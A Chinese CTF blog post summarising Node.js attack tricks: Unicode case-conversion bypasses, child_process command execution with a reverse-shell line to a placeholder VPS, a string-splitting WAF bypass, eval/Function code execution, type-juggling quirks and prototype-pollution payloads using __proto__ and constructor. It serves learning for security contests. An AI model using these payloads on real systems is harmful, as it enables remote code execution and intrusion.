

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



    <head>
        <meta charset="UTF-8">
        <link rel="apple-touch-icon" sizes="76x76" href="/img/avater.jpg">
        <link rel="icon" href="/img/avater.jpg">
        <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
        <meta http-equiv="x-ua-compatible" content="ie=edge">
        <link href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC&display=swap" rel="stylesheet">
        
                <meta name="theme-color" content="#2f4154">
                <meta name="author" content="whistle.H">
                <meta name="keywords" content="">
                
                    <meta name="description" content="node.js的相关安全问题之前在比赛中一直有遇到，一般都是现学现卖。 今天顺便也总结一下相关的payload。 大小写绕过 toUpperCase() 字符&quot;ı&quot;经过处理后结果为 &quot;I&quot; 字符&quot;ſ&quot; 经过处理后结果为&quot;S&quot; toLowerCase() 字符&quot;İ&quot;经过处理后变成&quot;i &quot; 字符&quot;K&quot;经过处理后结果为&quot;k&quot; 这个神奇的trick是p牛之前fuzz出来的，参考博客如下：">
<meta property="og:type" content="article">
<meta property="og:title" content="nodejs安全特性总结">
<meta property="og:url" content="http://example.com/2023/07/20/blog0030-node.js%E5%AE%89%E5%85%A8%E7%89%B9%E6%80%A7%E6%80%BB%E7%BB%93/index.html">
<meta property="og:site_name" content="The world of whistleH">
<meta property="og:description" content="node.js的相关安全问题之前在比赛中一直有遇到，一般都是现学现卖。 今天顺便也总结一下相关的payload。 大小写绕过 toUpperCase() 字符&quot;ı&quot;经过处理后结果为 &quot;I&quot; 字符&quot;ſ&quot; 经过处理后结果为&quot;S&quot; toLowerCase() 字符&quot;İ&quot;经过处理后变成&quot;i &quot; 字符&quot;K&quot;经过处理后结果为&quot;k&quot; 这个神奇的trick是p牛之前fuzz出来的，参考博客如下：">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-07-20T13:50:17.000Z">
<meta property="article:modified_time" content="2024-03-16T05:59:25.650Z">
<meta property="article:author" content="whistle.H">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="web">
<meta property="article:tag" content="notes">
<meta name="twitter:card" content="summary_large_image">
                        
                                
                                        
                                                    <title>
                                                        nodejs安全特性总结 - The world of whistleH
                                                    </title>

                                                    <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/mac.css">



                                                        <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
                                                            <script  src="/js/utils.js" ></script>
                                                                <script  src="/js/color-schema.js" ></script>
                                                                    


                                                                        
    <meta name="generator" content="Hexo 5.4.0"></head>

<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>The world of whistleH</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="nodejs安全特性总结"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-07-20 21:50" pubdate>
          2023年7月20日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          5.6k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          47 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">nodejs安全特性总结</h1>
            
            
              <div class="markdown-body">
                
                <p>node.js的相关安全问题之前在比赛中一直有遇到，一般都是现学现卖。</p>
<p>今天顺便也总结一下相关的payload。</p>
<h2 id="大小写绕过">大小写绕过</h2>
<p>toUpperCase()</p>
<p>字符<code>"ı"</code>经过处理后结果为 <code>"I"</code></p>
<p>字符<code>"ſ"</code> 经过处理后结果为<code>"S"</code></p>
<p>toLowerCase()</p>
<p>字符<code>"İ"</code>经过处理后变成<code>"i "</code></p>
<p>字符<code>"K"</code>经过处理后结果为<code>"k"</code></p>
<p>这个神奇的trick是p牛之前fuzz出来的，参考博客如下：</p>
<p><a target="_blank" rel="noopener" href="https://www.leavesongs.com/HTML/javascript-up-low-ercase-tip.html">node.js大小写转换函数fuzz</a></p>
<h2 id="危险函数">危险函数</h2>
<h3 id="命令执行">命令执行</h3>
<p>在node.js中，执行系统命令的代码如下</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;child_process&#x27;</span>).execSync(<span class="hljs-string">&#x27;whoami&#x27;</span>)<br><span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;child_process&#x27;</span>).spawnSync(<span class="hljs-string">&#x27;ls&#x27;</span>,[<span class="hljs-string">&#x27;/&#x27;</span>]).stdout.toString()<br><span class="hljs-built_in">global</span>.process.mainModule.constructor._load(<span class="hljs-string">&#x27;child_process&#x27;</span>).exec(<span class="hljs-string">&#x27;bash -c \&quot;bash -i &gt;&amp; /dev/tcp/&#123;vps ip&#125;/2333 0&gt;&amp;1\&quot;&#x27;</span>)<br></code></pre></td></tr></table></figure>
<p>绕过字符串匹配的waf</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;child_process&#x27;</span>)[<span class="hljs-string">&quot;exe&quot;</span>+<span class="hljs-string">&quot;cSync&quot;</span>](<span class="hljs-string">&#x27;ls&#x27;</span>)<br></code></pre></td></tr></table></figure>
<h3 id="代码执行">代码执行</h3>
<p>node.js中也有相应的代码执行的函数</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-built_in">eval</span>(<span class="hljs-string">&quot;require(&#x27;child_process&#x27;).execSync(&#x27;calc&#x27;)&quot;</span>)<br></code></pre></td></tr></table></figure>
<p>除了eval之外，再介绍一个Function</p>
<p><code>Function</code> 是 JavaScript 中的一个内置对象和函数构造函数。它可以用来创建新的函数对象。</p>
<p>具体来说，通过 <code>new Function()</code> 或者直接将函数体作为字符串传递给 <code>Function</code> 构造函数，可以动态地创建一个函数。</p>
<p>函数参数是以字符串形式传递的，它们是函数在被调用时接收的值（也就是下面例子中的x，y）。函数体是一个字符串，表示函数的实际代码。</p>
<p>举个例子：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">var</span> add = <span class="hljs-keyword">new</span> <span class="hljs-built_in">Function</span>(<span class="hljs-string">&#x27;num1&#x27;</span>, <span class="hljs-string">&#x27;num2&#x27;</span>, <span class="hljs-string">&#x27;return num1 + num2;&#x27;</span>);<br><span class="hljs-built_in">console</span>.log(add(<span class="hljs-number">5</span>, <span class="hljs-number">3</span>)); <span class="hljs-comment">// 输出 8</span><br><br><span class="hljs-keyword">var</span> multiply = <span class="hljs-built_in">Function</span>(<span class="hljs-string">&#x27;x&#x27;</span>, <span class="hljs-string">&#x27;y&#x27;</span>, <span class="hljs-string">&#x27;return x * y;&#x27;</span>);<br><span class="hljs-built_in">console</span>.log(multiply(<span class="hljs-number">2</span>, <span class="hljs-number">4</span>)); <span class="hljs-comment">// 输出 8</span><br></code></pre></td></tr></table></figure>
<h2 id="弱类型比较">弱类型比较</h2>
<p>这里其实就是js经典弱比较导致的一堆锅</p>
<ul>
<li>数字与纯数字字符串比较时，会将纯数字字符串转换成数字比较</li>
<li>[]与[]比较恒为False</li>
<li>数组之间比较只比较第一个元素的值</li>
<li>数组取第一个元素与字符串比较</li>
</ul>
<p>这个就纯属trick了，我觉得还是见到了再收集吧</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-built_in">console</span>.log(<span class="hljs-string">&#x27;1&#x27;</span>==<span class="hljs-number">1</span>)  <span class="hljs-comment">// true</span><br><span class="hljs-built_in">console</span>.log(<span class="hljs-string">&#x27;2&#x27;</span>&gt;<span class="hljs-number">1</span>)   <span class="hljs-comment">// true</span><br><span class="hljs-built_in">console</span>.log([]==[])  <span class="hljs-comment">// false</span><br><span class="hljs-built_in">console</span>.log(&#123;&#125;==&#123;&#125;)  <span class="hljs-comment">// false</span><br><span class="hljs-built_in">console</span>.log([<span class="hljs-number">2</span>,<span class="hljs-number">100</span>,<span class="hljs-number">2</span>]&gt;[<span class="hljs-number">3</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>]) <span class="hljs-comment">// false</span><br></code></pre></td></tr></table></figure>
<p>还有一些特殊的比较</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-built_in">console</span>.log(<span class="hljs-literal">null</span>==<span class="hljs-literal">undefined</span>)  <span class="hljs-comment">// true</span><br><span class="hljs-built_in">console</span>.log(<span class="hljs-literal">null</span>===<span class="hljs-literal">undefined</span>) <span class="hljs-comment">// false</span><br><span class="hljs-built_in">console</span>.log(<span class="hljs-literal">NaN</span>==<span class="hljs-literal">NaN</span>)         <span class="hljs-comment">// false</span><br></code></pre></td></tr></table></figure>
<h2 id="变量拼接">变量拼接</h2>
<p>这个也是非常trick了，主要是各种类型的拼接</p>
<p>比如数组+字符串</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-built_in">console</span>.log(<span class="hljs-number">5</span>+[<span class="hljs-number">6</span>,<span class="hljs-number">6</span>]);       <span class="hljs-comment">//56,3 </span><br><span class="hljs-built_in">console</span>.log(<span class="hljs-string">&quot;5&quot;</span>+<span class="hljs-number">6</span>);         <span class="hljs-comment">//56 </span><br><span class="hljs-built_in">console</span>.log(<span class="hljs-string">&quot;5&quot;</span>+[<span class="hljs-number">6</span>,<span class="hljs-number">6</span>]);     <span class="hljs-comment">//56,6 </span><br><span class="hljs-built_in">console</span>.log(<span class="hljs-string">&quot;5&quot;</span>+[<span class="hljs-string">&quot;6&quot;</span>,<span class="hljs-string">&quot;6&quot;</span>]); <span class="hljs-comment">//56,6</span><br></code></pre></td></tr></table></figure>
<h2 id="md5绕过">MD5绕过</h2>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs javascript">md5(&#123;<span class="hljs-attr">x</span>:<span class="hljs-number">1</span>&#125;+<span class="hljs-string">&quot;123&quot;</span>)==md5(&#123;<span class="hljs-attr">x</span>:<span class="hljs-number">2</span>&#125;+<span class="hljs-string">&quot;123&quot;</span>)<br><span class="hljs-built_in">console</span>.log([<span class="hljs-number">1</span>]!==[<span class="hljs-number">1</span>])<br></code></pre></td></tr></table></figure>
<h2 id="url畸变">URL畸变</h2>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ruby"><span class="hljs-string">?q</span>uery=&#123;<span class="hljs-string">&quot;name&quot;</span><span class="hljs-symbol">:<span class="hljs-string">&quot;admin&quot;</span>&amp;query=<span class="hljs-string">&quot;password&quot;</span></span><span class="hljs-symbol">:<span class="hljs-string">&quot;admin&quot;</span></span>&#125;<br></code></pre></td></tr></table></figure>
<p>在node.js的HTTP处理框架中，等价</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ruby"><span class="hljs-string">?q</span>uery=&#123;<span class="hljs-string">&quot;name&quot;</span><span class="hljs-symbol">:<span class="hljs-string">&quot;admin&quot;</span></span>,<span class="hljs-string">&quot;password&quot;</span><span class="hljs-symbol">:<span class="hljs-string">&quot;admin&quot;</span></span>&#125;<br></code></pre></td></tr></table></figure>
<h2 id="原型链污染">原型链污染</h2>
<h3 id="原型链">原型链</h3>
<p>首先，我们需要明确什么是原型链，这涉及到javascript的一些底层实现。</p>
<p>以下是内容摘自官方文档：</p>
<p>对于使用过基于类的语言 (如 Java 或 C++) 的开发者们来说，JavaScript 实在是有些令人困惑 —— JavaScript 是动态的，本身不提供一个 <code>class</code> 的实现。即便是在 ES2015/ES6 中引入了 <code>class</code> 关键字，但那也只是语法糖，JavaScript 仍然是基于原型的。</p>
<p>当谈到继承时，JavaScript 只有一种结构：对象。每个实例对象（object）都有一个私有属性（称之为 <strong>proto</strong> ）指向它的构造函数的原型对象（<strong>prototype</strong>）。该原型对象也有一个自己的原型对象（<strong>proto</strong>），层层向上直到一个对象的原型对象为 <code>null</code>。根据定义，<code>null</code> 没有原型，并作为这个<strong>原型链</strong>中的最后一个环节。</p>
<p>几乎所有 JavaScript 中的对象都是位于原型链顶端的 <a target="_blank" rel="noopener" href="https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Global_Objects/Object"><code>Object</code></a> 的实例。</p>
<p>尽管这种原型继承通常被认为是 JavaScript 的弱点之一，但是原型继承模型本身实际上比经典模型更强大。例如，在原型模型的基础上构建经典模型相当简单。</p>
<p>我们来看一个例子：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">Father</span>(<span class="hljs-params"></span>) </span>&#123;<br>    <span class="hljs-built_in">this</span>.lastname = <span class="hljs-string">&quot;Donald&quot;</span>;<br>    <span class="hljs-built_in">this</span>.firstname = <span class="hljs-string">&quot;Trump&quot;</span>;<br>&#125;<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">Son</span>(<span class="hljs-params"></span>) </span>&#123;<br>    <span class="hljs-built_in">this</span>.firstname = <span class="hljs-string">&quot;Jack&quot;</span>;<br>&#125;<br><br>Son.prototype = <span class="hljs-keyword">new</span> Father();<br><br><span class="hljs-keyword">let</span> son = <span class="hljs-keyword">new</span> Son();<br><br><span class="hljs-built_in">console</span>.log(son);<br><span class="hljs-built_in">console</span>.log(son.__proto__ === Son.prototype);<br><span class="hljs-built_in">console</span>.log(son.__proto__)<br><span class="hljs-built_in">console</span>.log(son.__proto__.__proto__)<br><span class="hljs-built_in">console</span>.log(son.__proto__.__proto__.__proto__)<br><span class="hljs-built_in">console</span>.log(son.__proto__.__proto__.__proto__.__proto__)<br><span class="hljs-built_in">console</span>.log(<span class="hljs-string">`<span class="hljs-subst">$&#123;son.firstname&#125;</span>, <span class="hljs-subst">$&#123;son.lastname&#125;</span>`</span>)<br></code></pre></td></tr></table></figure>
<p>从这个例子的输出，大概能够简单理解出原型链的一个概念。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs shell">Father &#123; firstname: &#x27;Jack&#x27; &#125;<br>true<br>Father &#123; lastname: &#x27;Donald&#x27;, firstname: &#x27;Trump&#x27; &#125;<br>&#123;&#125;<br>[Object: null prototype] &#123;&#125;<br>null<br>Jack, Donald<br></code></pre></td></tr></table></figure>
<h3 id="污染利用">污染利用</h3>
<p>我们知道了存在原型链这个概念，那么怎么去利用呢。</p>
<p>我们再看下面一个例子，我们通过原型链导致对象中可以存在被利用的属性。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">Father</span>(<span class="hljs-params"></span>) </span>&#123;<br>    <span class="hljs-built_in">this</span>.lastname = <span class="hljs-string">&quot;Donald&quot;</span>;<br>    <span class="hljs-built_in">this</span>.firstname = <span class="hljs-string">&quot;Trump&quot;</span>;<br>&#125;<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">Son</span>(<span class="hljs-params"></span>) </span>&#123;<br>    <span class="hljs-built_in">this</span>.firstname = <span class="hljs-string">&quot;Jack&quot;</span>;<br>&#125;<br><br>Son.prototype = <span class="hljs-keyword">new</span> Father();<br><br><span class="hljs-keyword">let</span> son = <span class="hljs-keyword">new</span> Son();<br><span class="hljs-built_in">console</span>.log(<span class="hljs-string">`<span class="hljs-subst">$&#123;son.firstname&#125;</span>, <span class="hljs-subst">$&#123;son.lastname&#125;</span>`</span>)<br><br>son.__proto__.lastname = <span class="hljs-string">&quot;kiki&quot;</span><br><br><span class="hljs-keyword">let</span> other_son = <span class="hljs-keyword">new</span> Son();<br><span class="hljs-built_in">console</span>.log(<span class="hljs-string">`<span class="hljs-subst">$&#123;other_son.firstname&#125;</span>, <span class="hljs-subst">$&#123;other_son.lastname&#125;</span>`</span>)<br><br>son.__proto__.__proto__.__proto__.lastname = <span class="hljs-string">&quot;hacker!!!&quot;</span><br><span class="hljs-built_in">console</span>.log(<span class="hljs-string">&quot;&quot;</span>.lastname)<br></code></pre></td></tr></table></figure>
<p>输出如下：</p>
<figure class="highlight erlang-repl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs erlang-repl">Jack, Donald<br>Jack, kiki<br>hacker!!!<br></code></pre></td></tr></table></figure>
<p>我们可以看到，如果能够利用原型链污染，我们可以直接向上追溯，从而修改控制链上对象的属性修改。</p>
<h3 id="mergecopy">merge/copy</h3>
<p>常见的原型链污染，发生在对象的嵌套copy/merge上</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">copy</span>(<span class="hljs-params">object1, object2</span>)</span>&#123;<br>    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">let</span> key <span class="hljs-keyword">in</span> object2) &#123;<br>        <span class="hljs-comment">// console.log(&quot;key : &quot;, key)</span><br>        <span class="hljs-keyword">if</span> (key <span class="hljs-keyword">in</span> object2 &amp;&amp; key <span class="hljs-keyword">in</span> object1) &#123;<br>            copy(object1[key], object2[key])<br>        &#125; <span class="hljs-keyword">else</span> &#123;<br>            object1[key] = object2[key]<br>        &#125;<br>    &#125;<br>  &#125;<br></code></pre></td></tr></table></figure>
<p>当然，这里我们需要注意的一点是，merge中我们的处理对象是key，所以你的<code>__proto__</code>应该是键名而不是原型。</p>
<p>比如，如下例子中，我们可以看到原型链并没有污染。这是因为<code>__proto__</code>没有被当做key来进行处理</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">let</span> victim = &#123;&#125;<br><span class="hljs-keyword">let</span> hacker = &#123; <span class="hljs-attr">a</span>: <span class="hljs-number">1</span>, <span class="hljs-attr">__proto__</span>: &#123; <span class="hljs-attr">b</span>: <span class="hljs-number">2</span> &#125; &#125;<br>copy(victim, hacker)<br><span class="hljs-built_in">console</span>.log(victim)<br><br>o3 = &#123;&#125;<br><span class="hljs-built_in">console</span>.log(o3.b)<br><br><span class="hljs-comment">// key :  a</span><br><span class="hljs-comment">// key :  b</span><br><span class="hljs-comment">// &#123; a: 1, b: 2 &#125;</span><br><span class="hljs-comment">// undefined</span><br></code></pre></td></tr></table></figure>
<p>我们修改代码如下，即可就能成功实现原型链的污染</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">copy</span>(<span class="hljs-params">object1, object2</span>) </span>&#123;<br>    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">let</span> key <span class="hljs-keyword">in</span> object2) &#123;<br>        <span class="hljs-keyword">if</span> (key <span class="hljs-keyword">in</span> object2 &amp;&amp; key <span class="hljs-keyword">in</span> object1) &#123;<br>            copy(object1[key], object2[key])<br>        &#125; <span class="hljs-keyword">else</span> &#123;<br>            object1[key] = object2[key]<br>        &#125;<br>    &#125;<br>&#125;<br><br><span class="hljs-keyword">let</span> victim = &#123;&#125;<br><span class="hljs-keyword">let</span> hacker = <span class="hljs-built_in">JSON</span>.parse(<span class="hljs-string">&#x27;&#123; &quot;a&quot;: 1, &quot;__proto__&quot;: &#123; &quot;b&quot;: 2 &#125; &#125;&#x27;</span>)<br>copy(victim, hacker)<br><span class="hljs-built_in">console</span>.log(victim.a, victim.b)<br><br>o3 = &#123;&#125;<br><span class="hljs-built_in">console</span>.log(o3.b)<br><br><span class="hljs-comment">// key :  a</span><br><span class="hljs-comment">// key :  __proto__</span><br><span class="hljs-comment">// key :  b</span><br><span class="hljs-comment">// 1 2</span><br><span class="hljs-comment">// 2</span><br></code></pre></td></tr></table></figure>
<h3 id="constructor">constructor</h3>
<p>除了<code>__proto__</code>之外，修改对象的Construct也是可以实现原型链污染</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">let</span> hacker = <span class="hljs-built_in">JSON</span>.parse(<span class="hljs-string">&#x27;&#123; &quot;a&quot;: 1, &quot;constructor&quot;: &#123; &quot;prototype&quot;: &#123;&quot;b&quot; : 1&#125; &#125; &#125;&#x27;</span>)<br><span class="hljs-built_in">console</span>.log(hacker)<br><br>copy(&#123;&#125;, hacker)<br><br>o3 = &#123;&#125;<br><span class="hljs-built_in">console</span>.log(o3.b)<br><br><span class="hljs-comment">// &#123; a: 1, constructor: &#123; prototype: &#123; b: 1 &#125; &#125; &#125;</span><br><span class="hljs-comment">// key :  a</span><br><span class="hljs-comment">// key :  constructor</span><br><span class="hljs-comment">// key :  prototype</span><br><span class="hljs-comment">// key :  b</span><br><span class="hljs-comment">// 1</span><br></code></pre></td></tr></table></figure>
<h3 id="漏洞实例">漏洞实例</h3>
<p>模板引擎污染（ejs、jade）</p>
<p>不过这个个人认为锅不在模板，毕竟本身是程序员其他地方导致的原型链被污染了，才会发生具体的污染。</p>
<p>具体的分析就等后续的博客吧~</p>
<h2 id="参考博客">参考博客</h2>
<p><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html"></a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7184"></a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" class="category-chain-item">代码审计</a>
  
  
    <span>></span>
    
